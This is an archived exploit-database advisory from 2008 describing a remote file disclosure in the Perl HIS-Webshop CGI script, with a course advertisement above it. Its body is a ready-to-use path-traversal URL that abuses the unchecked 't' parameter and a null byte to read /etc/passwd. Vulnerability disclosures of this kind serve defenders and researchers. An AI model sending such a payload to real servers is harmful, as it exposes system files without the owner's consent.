HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure

EDB-ID:

5304


Author:

Zero X

Type:

webapps


Platform:

CGI

Date:

2008-03-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn´t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>

# milw0rm.com [2008-03-24]